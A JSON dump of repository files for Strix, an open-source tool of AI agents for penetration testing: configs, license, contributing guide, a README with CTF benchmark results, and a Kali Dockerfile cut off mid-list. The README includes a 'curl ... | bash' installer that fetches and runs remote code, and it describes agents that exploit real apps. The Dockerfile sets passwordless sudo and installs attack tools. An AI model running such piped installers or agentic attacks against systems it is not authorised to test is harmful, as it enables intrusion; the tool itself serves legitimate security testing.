[ { "path": ".github/ISSUE_TEMPLATE/bug_report.md", "content": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: \"[BUG]\"\nlabels: bug\nassignees: ''\n\n---\n\n**Describe the bug**\nA clear and concise description of what the bug is.\n\n**To Reproduce**\nSteps to reproduce the behavior:\n1.\n2.\n3.\n4.\n\n**Expected behavior**\nA clear and concise description of what you expected to happen.\n\n**Screenshots**\nIf applicable, add screenshots to help explain your problem.\n\n**System Information:**\n- OS: [e.g. Ubuntu 22.04]\n- Strix Version or Commit: [e.g. 0.1.18]\n- Python Version: [e.g. 3.12]\n- LLM Used: [e.g. GPT-5, Claude Sonnet 4.6]\n\n**Additional context**\nAdd any other context about the problem here.\n" }, { "path": ".github/ISSUE_TEMPLATE/feature_request.md", "content": "---\nname: Feature request\nabout: Suggest an idea for this project\ntitle: \"[FEATURE]\"\nlabels: enhancement\nassignees: ''\n\n---\n\n**Is your feature request related to a problem? Please describe.**\nA clear and concise description of what the problem is. Ex. I'm always frustrated when [...]\n\n**Describe the solution you'd like**\nA clear and concise description of what you want to happen.\n\n**Describe alternatives you've considered**\nA clear and concise description of any alternative solutions or features you've considered.\n\n**Additional context**\nAdd any other context or screenshots about the feature request here.\n" }, { "path": ".github/workflows/build-release.yml", "content": "name: Build & Release\n\non:\n push:\n tags:\n - 'v*'\n workflow_dispatch:\n\njobs:\n build:\n strategy:\n fail-fast: false\n matrix:\n include:\n - os: macos-latest\n target: macos-arm64\n - os: macos-15-intel\n target: macos-x86_64\n - os: ubuntu-latest\n target: linux-x86_64\n - os: windows-latest\n target: windows-x86_64\n\n runs-on: ${{ matrix.os }}\n\n steps:\n - uses: actions/checkout@v4\n\n - uses: actions/setup-python@v5\n with:\n python-version: '3.12'\n\n - uses: snok/install-poetry@v1\n\n - name: Build\n shell: bash\n run: |\n poetry install --with dev\n poetry run pyinstaller strix.spec --noconfirm\n\n VERSION=$(poetry version -s)\n mkdir -p dist/release\n\n if [[ \"${{ runner.os }}\" == \"Windows\" ]]; then\n cp dist/strix.exe \"dist/release/strix-${VERSION}-${{ matrix.target }}.exe\"\n (cd dist/release && 7z a \"strix-${VERSION}-${{ matrix.target }}.zip\" \"strix-${VERSION}-${{ matrix.target }}.exe\")\n else\n cp dist/strix \"dist/release/strix-${VERSION}-${{ matrix.target }}\"\n chmod +x \"dist/release/strix-${VERSION}-${{ matrix.target }}\"\n tar -C dist/release -czvf \"dist/release/strix-${VERSION}-${{ matrix.target }}.tar.gz\" \"strix-${VERSION}-${{ matrix.target }}\"\n fi\n\n - uses: actions/upload-artifact@v4\n with:\n name: strix-${{ matrix.target }}\n path: |\n dist/release/*.tar.gz\n dist/release/*.zip\n if-no-files-found: error\n\n release:\n needs: build\n runs-on: ubuntu-latest\n permissions:\n contents: write\n\n steps:\n - uses: actions/download-artifact@v4\n with:\n path: release\n merge-multiple: true\n\n - name: Create Release\n uses: softprops/action-gh-release@v2\n with:\n prerelease: ${{ !startsWith(github.ref, 'refs/tags/') }}\n generate_release_notes: true\n files: release/*\n" }, { "path": ".gitignore", "content": "# Python\n__pycache__/\n*.py[cod]\n*$py.class\n*.so\n.Python\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib/\nlib64/\nparts/\nsdist/\nvar/\nwheels/\n*.egg-info/\n.installed.cfg\n*.egg\n\n# Virtual Environment\nvenv/\nenv/\nENV/\n.env\n.venv\npip-log.txt\npip-delete-this-directory.txt\n\n# IDE\n.idea/\n.vscode/\n*.swp\n*.swo\n.DS_Store\n.project\n.pydevproject\n.settings/\n\n# Testing\n.tox/\n.coverage\n.coverage.*\n.cache\nnosetests.xml\ncoverage.xml\n*.cover\n.hypothesis/\n.pytest_cache/\nhtmlcov/\n\n# FastAPI\n.env.local\n.env.development.local\n.env.test.local\n.env.production.local\n\n# MongoDB\ndata/\nmongod.log\n*.mongodb\n*.mongorc.js\n\n# LLM and ML related\n*.bin\n*.pt\n*.pth\n*.onnx\n*.h5\n*.hdf5\n*.pkl\n*.joblib\nwandb/\nruns/\ncheckpoints/\nlogs/\ntensorboard/\n\n# Agent execution traces\nstrix_runs/\nagent_runs/\n\n# Misc\n*.log\n*.sqlite\n*.db\n.directory\n*.bak\n*.tmp\n*.temp\n.DS_Store\nThumbs.db\n\n*.schema.graphql\nschema.graphql\n\n.opencode/\n" }, { "path": ".pre-commit-config.yaml", "content": "repos:\n # Ruff for fast linting and formatting\n - repo: https://github.com/astral-sh/ruff-pre-commit\n rev: v0.11.13\n hooks:\n - id: ruff\n args: [--fix, --exit-non-zero-on-fix]\n name: ruff-lint\n - id: ruff-format\n name: ruff-format\n\n # MyPy for static type checking\n - repo: https://github.com/pre-commit/mirrors-mypy\n rev: v1.16.0\n hooks:\n - id: mypy\n additional_dependencies: [\n types-requests,\n types-python-dateutil,\n pydantic,\n fastapi,\n ]\n args: [--install-types, --non-interactive]\n\n # Built-in hooks for basic file checks\n - repo: https://github.com/pre-commit/pre-commit-hooks\n rev: v5.0.0\n hooks:\n - id: trailing-whitespace\n - id: end-of-file-fixer\n - id: check-toml\n - id: check-merge-conflict\n - id: check-added-large-files\n - id: debug-statements\n - id: check-case-conflict\n - id: check-docstring-first\n\n # Security checks with bandit\n - repo: https://github.com/PyCQA/bandit\n rev: 1.8.3\n hooks:\n - id: bandit\n args: [-c, pyproject.toml]\n\n # Additional Python code quality checks\n - repo: https://github.com/asottile/pyupgrade\n rev: v3.20.0\n hooks:\n - id: pyupgrade\n args: [--py312-plus]\n\nci:\n autofix_commit_msg: |\n [pre-commit.ci] auto fixes from pre-commit.com hooks\n\n for more information, see https://pre-commit.ci\n autofix_prs: true\n autoupdate_branch: \"\"\n autoupdate_commit_msg: \"[pre-commit.ci] pre-commit autoupdate\"\n autoupdate_schedule: weekly\n skip: []\n submodules: false\n" }, { "path": "CONTRIBUTING.md", "content": "# Contributing to Strix\n\nThank you for your interest in contributing to Strix! This guide will help you get started with development and contributions.\n\n## πŸš€ Development Setup\n\n### Prerequisites\n\n- Python 3.12+\n- Docker (running)\n- Poetry (for dependency management)\n- Git\n\n### Local Development\n\n1. **Clone the repository**\n ```bash\n git clone https://github.com/usestrix/strix.git\n cd strix\n ```\n\n2. **Install development dependencies**\n ```bash\n make setup-dev\n\n # or manually:\n poetry install --with=dev\n poetry run pre-commit install\n ```\n\n3. **Configure your LLM provider**\n ```bash\n export STRIX_LLM=\"openai/gpt-5\"\n export LLM_API_KEY=\"your-api-key\"\n ```\n\n4. **Run Strix in development mode**\n ```bash\n poetry run strix --target https://example.com\n ```\n\n## πŸ“š Contributing Skills\n\nSkills are specialized knowledge packages that enhance agent capabilities. See [strix/skills/README.md](strix/skills/README.md) for detailed guidelines.\n\n### Quick Guide\n\n1. **Choose the right category** (`/vulnerabilities`, `/frameworks`, `/technologies`, etc.)\n2. **Create a** `.md` file with your skill content\n3. **Include practical examples** - Working payloads, commands, or test cases\n4. **Provide validation methods** - How to confirm findings and avoid false positives\n5. **Submit via PR** with clear description\n\n## πŸ”§ Contributing Code\n\n### Pull Request Process\n\n1. **Create an issue first** - Describe the problem or feature\n2. **Fork and branch** - Work from the `main` branch\n3. **Make your changes** - Follow existing code style\n4. **Write/update tests** - Ensure coverage for new features\n5. **Run quality checks** - `make check-all` should pass\n6. **Submit PR** - Link to issue and provide context\n\n### PR Guidelines\n\n- **Clear description** - Explain what and why\n- **Small, focused changes** - One feature/fix per PR\n- **Include examples** - Show before/after behavior\n- **Update documentation** - If adding features\n- **Pass all checks** - Tests, linting, type checking\n\n### Code Style\n\n- Follow PEP 8 with 100-character line limit\n- Use type hints for all functions\n- Write docstrings for public methods\n- Keep functions focused and small\n- Use meaningful variable names\n\n## πŸ› Reporting Issues\n\nWhen reporting bugs, please include:\n\n- Python version and OS\n- Strix version\n- LLMs being used\n- Full error traceback\n- Steps to reproduce\n- Expected vs actual behavior\n\n## πŸ’‘ Feature Requests\n\nWe welcome feature ideas! Please:\n\n- Check existing issues first\n- Describe the use case clearly\n- Explain why it would benefit users\n- Consider implementation approach\n- Be open to discussion\n\n## 🀝 Community\n\n- **Discord**: [Join our community](https://discord.gg/strix-ai)\n- **Issues**: [GitHub Issues](https://github.com/usestrix/strix/issues)\n\n## ✨ Recognition\n\nWe value all contributions! Contributors will be:\n- Listed in release notes\n- Thanked in our Discord\n- Added to contributors list (coming soon)\n\n---\n\n**Questions?** Reach out on [Discord](https://discord.gg/strix-ai) or create an issue. We're here to help!\n" }, { "path": "LICENSE", "content": " Apache License\n Version 2.0, January 2004\n http://www.apache.org/licenses/\n\n TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION\n\n 1. Definitions.\n\n \"License\" shall mean the terms and conditions for use, reproduction,\n and distribution as defined by Sections 1 through 9 of this document.\n\n \"Licensor\" shall mean the copyright owner or entity authorized by\n the copyright owner that is granting the License.\n\n \"Legal Entity\" shall mean the union of the acting entity and all\n other entities that control, are controlled by, or are under common\n control with that entity. For the purposes of this definition,\n \"control\" means (i) the power, direct or indirect, to cause the\n direction or management of such entity, whether by contract or\n otherwise, or (ii) ownership of fifty percent (50%) or more of the\n outstanding shares, or (iii) beneficial ownership of such entity.\n\n \"You\" (or \"Your\") shall mean an individual or Legal Entity\n exercising permissions granted by this License.\n\n \"Source\" form shall mean the preferred form for making modifications,\n including but not limited to software source code, documentation\n source, and configuration files.\n\n \"Object\" form shall mean any form resulting from mechanical\n transformation or translation of a Source form, including but\n not limited to compiled object code, generated documentation,\n and conversions to other media types.\n\n \"Work\" shall mean the work of authorship, whether in Source or\n Object form, made available under the License, as indicated by a\n copyright notice that is included in or attached to the work\n (an example is provided in the Appendix below).\n\n \"Derivative Works\" shall mean any work, whether in Source or Object\n form, that is based on (or derived from) the Work and for which the\n editorial revisions, annotations, elaborations, or other modifications\n represent, as a whole, an original work of authorship. For the purposes\n of this License, Derivative Works shall not include works that remain\n separable from, or merely link (or bind by name) to the interfaces of,\n the Work and Derivative Works thereof.\n\n \"Contribution\" shall mean any work of authorship, including\n the original version of the Work and any modifications or additions\n to that Work or Derivative Works thereof, that is intentionally\n submitted to Licensor for inclusion in the Work by the copyright owner\n or by an individual or Legal Entity authorized to submit on behalf of\n the copyright owner. For the purposes of this definition, \"submitted\"\n means any form of electronic, verbal, or written communication sent\n to the Licensor or its representatives, including but not limited to\n communication on electronic mailing lists, source code control systems,\n and issue tracking systems that are managed by, or on behalf of, the\n Licensor for the purpose of discussing and improving the Work, but\n excluding communication that is conspicuously marked or otherwise\n designated in writing by the copyright owner as \"Not a Contribution.\"\n\n \"Contributor\" shall mean Licensor and any individual or Legal Entity\n on behalf of whom a Contribution has been received by Licensor and\n subsequently incorporated within the Work.\n\n 2. Grant of Copyright License. Subject to the terms and conditions of\n this License, each Contributor hereby grants to You a perpetual,\n worldwide, non-exclusive, no-charge, royalty-free, irrevocable\n copyright license to reproduce, prepare Derivative Works of,\n publicly display, publicly perform, sublicense, and distribute the\n Work and such Derivative Works in Source or Object form.\n\n 3. Grant of Patent License. Subject to the terms and conditions of\n this License, each Contributor hereby grants to You a perpetual,\n worldwide, non-exclusive, no-charge, royalty-free, irrevocable\n (except as stated in this section) patent license to make, have made,\n use, offer to sell, sell, import, and otherwise transfer the Work,\n where such license applies only to those patent claims licensable\n by such Contributor that are necessarily infringed by their\n Contribution(s) alone or by combination of their Contribution(s)\n with the Work to which such Contribution(s) was submitted. If You\n institute patent litigation against any entity (including a\n cross-claim or counterclaim in a lawsuit) alleging that the Work\n or a Contribution incorporated within the Work constitutes direct\n or contributory patent infringement, then any patent licenses\n granted to You under this License for that Work shall terminate\n as of the date such litigation is filed.\n\n 4. Redistribution. You may reproduce and distribute copies of the\n Work or Derivative Works thereof in any medium, with or without\n modifications, and in Source or Object form, provided that You\n meet the following conditions:\n\n (a) You must give any other recipients of the Work or\n Derivative Works a copy of this License; and\n\n (b) You must cause any modified files to carry prominent notices\n stating that You changed the files; and\n\n (c) You must retain, in the Source form of any Derivative Works\n that You distribute, all copyright, patent, trademark, and\n attribution notices from the Source form of the Work,\n excluding those notices that do not pertain to any part of\n the Derivative Works; and\n\n (d) If the Work includes a \"NOTICE\" text file as part of its\n distribution, then any Derivative Works that You distribute must\n include a readable copy of the attribution notices contained\n within such NOTICE file, excluding those notices that do not\n pertain to any part of the Derivative Works, in at least one\n of the following places: within a NOTICE text file distributed\n as part of the Derivative Works; within the Source form or\n documentation, if provided along with the Derivative Works; or,\n within a display generated by the Derivative Works, if and\n wherever such third-party notices normally appear. The contents\n of the NOTICE file are for informational purposes only and\n do not modify the License. You may add Your own attribution\n notices within Derivative Works that You distribute, alongside\n or as an addendum to the NOTICE text from the Work, provided\n that such additional attribution notices cannot be construed\n as modifying the License.\n\n You may add Your own copyright statement to Your modifications and\n may provide additional or different license terms and conditions\n for use, reproduction, or distribution of Your modifications, or\n for any such Derivative Works as a whole, provided Your use,\n reproduction, and distribution of the Work otherwise complies with\n the conditions stated in this License.\n\n 5. Submission of Contributions. Unless You explicitly state otherwise,\n any Contribution intentionally submitted for inclusion in the Work\n by You to the Licensor shall be under the terms and conditions of\n this License, without any additional terms or conditions.\n Notwithstanding the above, nothing herein shall supersede or modify\n the terms of any separate license agreement you may have executed\n with Licensor regarding such Contributions.\n\n 6. Trademarks. This License does not grant permission to use the trade\n names, trademarks, service marks, or product names of the Licensor,\n except as required for reasonable and customary use in describing the\n origin of the Work and reproducing the content of the NOTICE file.\n\n 7. Disclaimer of Warranty. Unless required by applicable law or\n agreed to in writing, Licensor provides the Work (and each\n Contributor provides its Contributions) on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n implied, including, without limitation, any warranties or conditions\n of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A\n PARTICULAR PURPOSE. You are solely responsible for determining the\n appropriateness of using or redistributing the Work and assume any\n risks associated with Your exercise of permissions under this License.\n\n 8. Limitation of Liability. In no event and under no legal theory,\n whether in tort (including negligence), contract, or otherwise,\n unless required by applicable law (such as deliberate and grossly\n negligent acts) or agreed to in writing, shall any Contributor be\n liable to You for damages, including any direct, indirect, special,\n incidental, or consequential damages of any character arising as a\n result of this License or out of the use or inability to use the\n Work (including but not limited to damages for loss of goodwill,\n work stoppage, computer failure or malfunction, or any and all\n other commercial damages or losses), even if such Contributor\n has been advised of the possibility of such damages.\n\n 9. Accepting Warranty or Additional Liability. While redistributing\n the Work or Derivative Works thereof, You may choose to offer,\n and charge a fee for, acceptance of support, warranty, indemnity,\n or other liability obligations and/or rights consistent with this\n License. However, in accepting such obligations, You may act only\n on Your own behalf and on Your sole responsibility, not on behalf\n of any other Contributor, and only if You agree to indemnify,\n defend, and hold each Contributor harmless for any liability\n incurred by, or claims asserted against, such Contributor by reason\n of your accepting any such warranty or additional liability.\n\n END OF TERMS AND CONDITIONS\n\n APPENDIX: How to apply the Apache License to your work.\n\n To apply the Apache License to your work, attach the following\n boilerplate notice, with the fields enclosed by brackets \"[]\"\n replaced with your own identifying information. (Don't include\n the brackets!) The text should be enclosed in the appropriate\n comment syntax for the file format. We also recommend that a\n file or class name and description of purpose be included on the\n same \"printed page\" as the copyright notice for easier\n identification within third-party archives.\n\n Copyright 2025 OmniSecure Inc.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n" }, { "path": "Makefile", "content": ".PHONY: help install dev-install format lint type-check test test-cov clean pre-commit setup-dev\n\nhelp:\n\t@echo \"Available commands:\"\n\t@echo \" setup-dev - Install all development dependencies and setup pre-commit\"\n\t@echo \" install - Install production dependencies\"\n\t@echo \" dev-install - Install development dependencies\"\n\t@echo \"\"\n\t@echo \"Code Quality:\"\n\t@echo \" format - Format code with ruff\"\n\t@echo \" lint - Lint code with ruff and pylint\"\n\t@echo \" type-check - Run type checking with mypy and pyright\"\n\t@echo \" security - Run security checks with bandit\"\n\t@echo \" check-all - Run all code quality checks\"\n\t@echo \"\"\n\t@echo \"Testing:\"\n\t@echo \" test - Run tests with pytest\"\n\t@echo \" test-cov - Run tests with coverage reporting\"\n\t@echo \"\"\n\t@echo \"Development:\"\n\t@echo \" pre-commit - Run pre-commit hooks on all files\"\n\t@echo \" clean - Clean up cache files and artifacts\"\n\ninstall:\n\tpoetry install --only=main\n\ndev-install:\n\tpoetry install --with=dev\n\nsetup-dev: dev-install\n\tpoetry run pre-commit install\n\t@echo \"βœ… Development environment setup complete!\"\n\t@echo \"Run 'make check-all' to verify everything works correctly.\"\n\nformat:\n\t@echo \"🎨 Formatting code with ruff...\"\n\tpoetry run ruff format .\n\t@echo \"βœ… Code formatting complete!\"\n\nlint:\n\t@echo \"πŸ” Linting code with ruff...\"\n\tpoetry run ruff check . --fix\n\t@echo \"πŸ“ Running additional linting with pylint...\"\n\tpoetry run pylint strix/ --score=no --reports=no\n\t@echo \"βœ… Linting complete!\"\n\ntype-check:\n\t@echo \"πŸ” Type checking with mypy...\"\n\tpoetry run mypy strix/\n\t@echo \"πŸ” Type checking with pyright...\"\n\tpoetry run pyright strix/\n\t@echo \"βœ… Type checking complete!\"\n\nsecurity:\n\t@echo \"πŸ”’ Running security checks with bandit...\"\n\tpoetry run bandit -r strix/ -c pyproject.toml\n\t@echo \"βœ… Security checks complete!\"\n\ncheck-all: format lint type-check security\n\t@echo \"βœ… All code quality checks passed!\"\n\ntest:\n\t@echo \"πŸ§ͺ Running tests...\"\n\tpoetry run pytest -v\n\t@echo \"βœ… Tests complete!\"\n\ntest-cov:\n\t@echo \"πŸ§ͺ Running tests with coverage...\"\n\tpoetry run pytest -v --cov=strix --cov-report=term-missing --cov-report=html\n\t@echo \"βœ… Tests with coverage complete!\"\n\t@echo \"πŸ“Š Coverage report generated in htmlcov/\"\n\npre-commit:\n\t@echo \"πŸ”§ Running pre-commit hooks...\"\n\tpoetry run pre-commit run --all-files\n\t@echo \"βœ… Pre-commit hooks complete!\"\n\nclean:\n\t@echo \"🧹 Cleaning up cache files...\"\n\tfind . -type d -name \"__pycache__\" -exec rm -rf {} + 2>/dev/null || true\n\tfind . -type d -name \".pytest_cache\" -exec rm -rf {} + 2>/dev/null || true\n\tfind . -type d -name \".mypy_cache\" -exec rm -rf {} + 2>/dev/null || true\n\tfind . -type d -name \".ruff_cache\" -exec rm -rf {} + 2>/dev/null || true\n\tfind . -type d -name \"htmlcov\" -exec rm -rf {} + 2>/dev/null || true\n\tfind . -name \"*.pyc\" -delete 2>/dev/null || true\n\tfind . -name \".coverage\" -delete 2>/dev/null || true\n\t@echo \"βœ… Cleanup complete!\"\n\ndev: format lint type-check test\n\t@echo \"βœ… Development cycle complete!\"\n" }, { "path": "README.md", "content": "

\n \n \"Strix\n \n

\n\n
\n\n# Strix\n\n### Open-source AI hackers to find and fix your app’s vulnerabilities.\n\n
\n\n\n\"Docs\"\n\"Website\"\n[![](https://dcbadge.limes.pink/api/server/strix-ai)](https://discord.gg/strix-ai)\n\n\"Ask\n\"GitHub\n\"License\"\n\"PyPI\n\n\n\"Join\n\"Follow\n\n\n\"usestrix/strix\n\n
\n\n\n\n> [!TIP]\n> **New!** Strix integrates seamlessly with GitHub Actions and CI/CD pipelines. Automatically scan for vulnerabilities on every pull request and block insecure code before it reaches production!\n\n---\n\n\n## Strix Overview\n\nStrix are autonomous AI agents that act just like real hackers - they run your code dynamically, find vulnerabilities, and validate them through actual proof-of-concepts. Built for developers and security teams who need fast, accurate security testing without the overhead of manual pentesting or the false positives of static analysis tools.\n\n**Key Capabilities:**\n\n- **Full hacker toolkit** out of the box\n- **Teams of agents** that collaborate and scale\n- **Real validation** with PoCs, not false positives\n- **Developer‑first** CLI with actionable reports\n- **Auto‑fix & reporting** to accelerate remediation\n\n\n
\n\n\n
\n \n \"Strix\n \n
\n\n\n## Use Cases\n\n- **Application Security Testing** - Detect and validate critical vulnerabilities in your applications\n- **Rapid Penetration Testing** - Get penetration tests done in hours, not weeks, with compliance reports\n- **Bug Bounty Automation** - Automate bug bounty research and generate PoCs for faster reporting\n- **CI/CD Integration** - Run tests in CI/CD to block vulnerabilities before reaching production\n\n## πŸš€ Quick Start\n\n**Prerequisites:**\n- Docker (running)\n- An LLM API key:\n - Any [supported provider](https://docs.strix.ai/llm-providers/overview) (OpenAI, Anthropic, Google, etc.)\n - Or [Strix Router](https://models.strix.ai) β€” single API key for multiple providers\n\n### Installation & First Scan\n\n```bash\n# Install Strix\ncurl -sSL https://strix.ai/install | bash\n\n# Configure your AI provider\nexport STRIX_LLM=\"openai/gpt-5\" # or \"strix/gpt-5\" via Strix Router (https://models.strix.ai)\nexport LLM_API_KEY=\"your-api-key\"\n\n# Run your first security assessment\nstrix --target ./app-directory\n```\n\n> [!NOTE]\n> First run automatically pulls the sandbox Docker image. Results are saved to `strix_runs/`\n\n---\n\n## ☁️ Strix Platform\n\nTry the Strix full-stack security platform at **[app.strix.ai](https://app.strix.ai)** β€” sign up for free, connect your repos and domains, and launch a pentest in minutes.\n\n- **Validated findings with PoCs** and reproduction steps\n- **One-click autofix** as ready-to-merge pull requests\n- **Continuous monitoring** across code, cloud, and infrastructure\n- **Integrations** with GitHub, Slack, Jira, Linear, and CI/CD pipelines\n- **Continuous learning** that builds on past findings and remediations\n\n[**Start your first pentest β†’**](https://app.strix.ai)\n\n---\n\n## ✨ Features\n\n### Agentic Security Tools\n\nStrix agents come equipped with a comprehensive security testing toolkit:\n\n- **Full HTTP Proxy** - Full request/response manipulation and analysis\n- **Browser Automation** - Multi-tab browser for testing of XSS, CSRF, auth flows\n- **Terminal Environments** - Interactive shells for command execution and testing\n- **Python Runtime** - Custom exploit development and validation\n- **Reconnaissance** - Automated OSINT and attack surface mapping\n- **Code Analysis** - Static and dynamic analysis capabilities\n- **Knowledge Management** - Structured findings and attack documentation\n\n### Comprehensive Vulnerability Detection\n\nStrix can identify and validate a wide range of security vulnerabilities:\n\n- **Access Control** - IDOR, privilege escalation, auth bypass\n- **Injection Attacks** - SQL, NoSQL, command injection\n- **Server-Side** - SSRF, XXE, deserialization flaws\n- **Client-Side** - XSS, prototype pollution, DOM vulnerabilities\n- **Business Logic** - Race conditions, workflow manipulation\n- **Authentication** - JWT vulnerabilities, session management\n- **Infrastructure** - Misconfigurations, exposed services\n\n### Graph of Agents\n\nAdvanced multi-agent orchestration for comprehensive security testing:\n\n- **Distributed Workflows** - Specialized agents for different attacks and assets\n- **Scalable Testing** - Parallel execution for fast comprehensive coverage\n- **Dynamic Coordination** - Agents collaborate and share discoveries\n\n---\n\n## Usage Examples\n\n### Basic Usage\n\n```bash\n# Scan a local codebase\nstrix --target ./app-directory\n\n# Security review of a GitHub repository\nstrix --target https://github.com/org/repo\n\n# Black-box web application assessment\nstrix --target https://your-app.com\n```\n\n### Advanced Testing Scenarios\n\n```bash\n# Grey-box authenticated testing\nstrix --target https://your-app.com --instruction \"Perform authenticated testing using credentials: user:pass\"\n\n# Multi-target testing (source code + deployed app)\nstrix -t https://github.com/org/app -t https://your-app.com\n\n# Focused testing with custom instructions\nstrix --target api.your-app.com --instruction \"Focus on business logic flaws and IDOR vulnerabilities\"\n\n# Provide detailed instructions through file (e.g., rules of engagement, scope, exclusions)\nstrix --target api.your-app.com --instruction-file ./instruction.md\n```\n\n### Headless Mode\n\nRun Strix programmatically without interactive UI using the `-n/--non-interactive` flagβ€”perfect for servers and automated jobs. The CLI prints real-time vulnerability findings, and the final report before exiting. Exits with non-zero code when vulnerabilities are found.\n\n```bash\nstrix -n --target https://your-app.com\n```\n\n### CI/CD (GitHub Actions)\n\nStrix can be added to your pipeline to run a security test on pull requests with a lightweight GitHub Actions workflow:\n\n```yaml\nname: strix-penetration-test\n\non:\n pull_request:\n\njobs:\n security-scan:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v6\n\n - name: Install Strix\n run: curl -sSL https://strix.ai/install | bash\n\n - name: Run Strix\n env:\n STRIX_LLM: ${{ secrets.STRIX_LLM }}\n LLM_API_KEY: ${{ secrets.LLM_API_KEY }}\n\n run: strix -n -t ./ --scan-mode quick\n```\n\n### Configuration\n\n```bash\nexport STRIX_LLM=\"openai/gpt-5\"\nexport LLM_API_KEY=\"your-api-key\"\n\n# Optional\nexport LLM_API_BASE=\"your-api-base-url\" # if using a local model, e.g. Ollama, LMStudio\nexport PERPLEXITY_API_KEY=\"your-api-key\" # for search capabilities\nexport STRIX_REASONING_EFFORT=\"high\" # control thinking effort (default: high, quick scan: medium)\n```\n\n> [!NOTE]\n> Strix automatically saves your configuration to `~/.strix/cli-config.json`, so you don't have to re-enter it on every run.\n\n**Recommended models for best results:**\n\n- [OpenAI GPT-5](https://openai.com/api/) β€” `openai/gpt-5`\n- [Anthropic Claude Sonnet 4.6](https://claude.com/platform/api) β€” `anthropic/claude-sonnet-4-6`\n- [Google Gemini 3 Pro Preview](https://cloud.google.com/vertex-ai) β€” `vertex_ai/gemini-3-pro-preview`\n\nSee the [LLM Providers documentation](https://docs.strix.ai/llm-providers/overview) for all supported providers including Vertex AI, Bedrock, Azure, and local models.\n\n## Enterprise\n\nGet the same Strix experience with [enterprise-grade](https://strix.ai/demo) controls: SSO (SAML/OIDC), custom compliance reports, dedicated support & SLA, custom deployment options (VPC/self-hosted), BYOK model support, and tailored agents optimized for your environment. [Learn more](https://strix.ai/demo).\n\n## Documentation\n\nFull documentation is available at **[docs.strix.ai](https://docs.strix.ai)** β€” including detailed guides for usage, CI/CD integrations, skills, and advanced configuration.\n\n## Contributing\n\nWe welcome contributions of code, docs, and new skills - check out our [Contributing Guide](https://docs.strix.ai/contributing) to get started or open a [pull request](https://github.com/usestrix/strix/pulls)/[issue](https://github.com/usestrix/strix/issues).\n\n## Join Our Community\n\nHave questions? Found a bug? Want to contribute? **[Join our Discord!](https://discord.gg/strix-ai)**\n\n## Support the Project\n\n**Love Strix?** Give us a ⭐ on GitHub!\n\n## Acknowledgements\n\nStrix builds on the incredible work of open-source projects like [LiteLLM](https://github.com/BerriAI/litellm), [Caido](https://github.com/caido/caido), [Nuclei](https://github.com/projectdiscovery/nuclei), [Playwright](https://github.com/microsoft/playwright), and [Textual](https://github.com/Textualize/textual). Huge thanks to their maintainers!\n\n\n> [!WARNING]\n> Only test apps you own or have permission to test. You are responsible for using Strix ethically and legally.\n\n\n" }, { "path": "benchmarks/README.md", "content": "# Benchmarks\n\nWe use security benchmarks to track Strix's capabilities and improvements over time. We plan to add more benchmarks, both existing ones and our own, to help the community evaluate and compare security agents.\n\n\n## Full Details\n\nFor the complete benchmark results, evaluation scripts, and run data, see the [usestrix/benchmarks](https://github.com/usestrix/benchmarks) repository.\n\n> [!NOTE]\n> We are actively adding more benchmarks to our evaluation suite.\n\n\n## Results\n\n| Benchmark | Challenges | Success Rate |\n|-----------|------------|--------------|\n| [XBEN](https://github.com/usestrix/benchmarks/tree/main/XBEN) | 104 | **96%** |\n\n### XBEN\n\nThe [XBOW benchmark](https://github.com/usestrix/benchmarks/tree/main/XBEN) is a set of 104 web security challenges designed to evaluate autonomous penetration testing agents. Each challenge follows a CTF format where the agent must discover and exploit vulnerabilities to extract a hidden flag.\n\nStrix `v0.4.0` achieved a **96% success rate** (100/104 challenges) in black-box mode.\n\n```mermaid\n%%{init: {'theme': 'base', 'themeVariables': { 'pie1': '#3b82f6', 'pie2': '#1e3a5f', 'pieTitleTextColor': '#ffffff', 'pieSectionTextColor': '#ffffff', 'pieLegendTextColor': '#ffffff'}}}%%\npie title Challenge Outcomes (104 Total)\n \"Solved\" : 100\n \"Unsolved\" : 4\n```\n\n**Performance by Difficulty:**\n\n| Difficulty | Solved | Success Rate |\n|------------|--------|--------------|\n| Level 1 (Easy) | 45/45 | 100% |\n| Level 2 (Medium) | 49/51 | 96% |\n| Level 3 (Hard) | 6/8 | 75% |\n\n**Resource Usage:**\n- Average solve time: ~19 minutes\n- Total cost: ~$337 for 100 challenges\n" }, { "path": "containers/Dockerfile", "content": "FROM kalilinux/kali-rolling:latest\n\nLABEL description=\"AI Agent Penetration Testing Environment with Comprehensive Automated Tools\"\n\nRUN apt-get update && \\\n apt-get install -y kali-archive-keyring sudo && \\\n apt-get update && \\\n apt-get upgrade -y\n\nRUN useradd -m -s /bin/bash pentester && \\\n usermod -aG sudo pentester && \\\n echo \"pentester ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers && \\\n touch /home/pentester/.hushlogin\n\nRUN mkdir -p /home/pentester/configs \\\n /home/pentester/wordlists \\\n /home/pentester/output \\\n /home/pentester/scripts \\\n /home/pentester/tools \\\n /app/runtime \\\n /app/tools \\\n /app/certs && \\\n chown -R pentester:pentester /app/certs /home/pentester/tools\n\nRUN apt-get update && \\\n apt-get install -y --no-install-recommends \\\n wget curl git vim nano unzip tar \\\n apt-transport-https ca-certificates gnupg lsb-release \\\n build-essential software-properties-common \\\n gcc libc6-dev pkg-config libpcap-dev libssl-dev \\\n python3 python3-pip python3-dev python3-venv python3-setuptools \\\n golang-go \\\n net-tools dnsutils whois \\\n jq parallel ripgrep grep \\\n less man-db procps htop \\\n iproute2 iputils-ping netcat-traditional \\\n nmap ncat ndiff \\\n sqlmap nuclei subfinder naabu ffuf \\\n nodejs npm pipx \\\n libcap2-bin \\\n gdb \\\n tmux \\\n libnss3 libnspr4 libdbus-1-3 libatk1.0-0 libatk-bridge2.0-0 libcups2 libdrm2 libatspi2.0-0 \\\n libxcomposite1 libxdamage1 libxfixes3 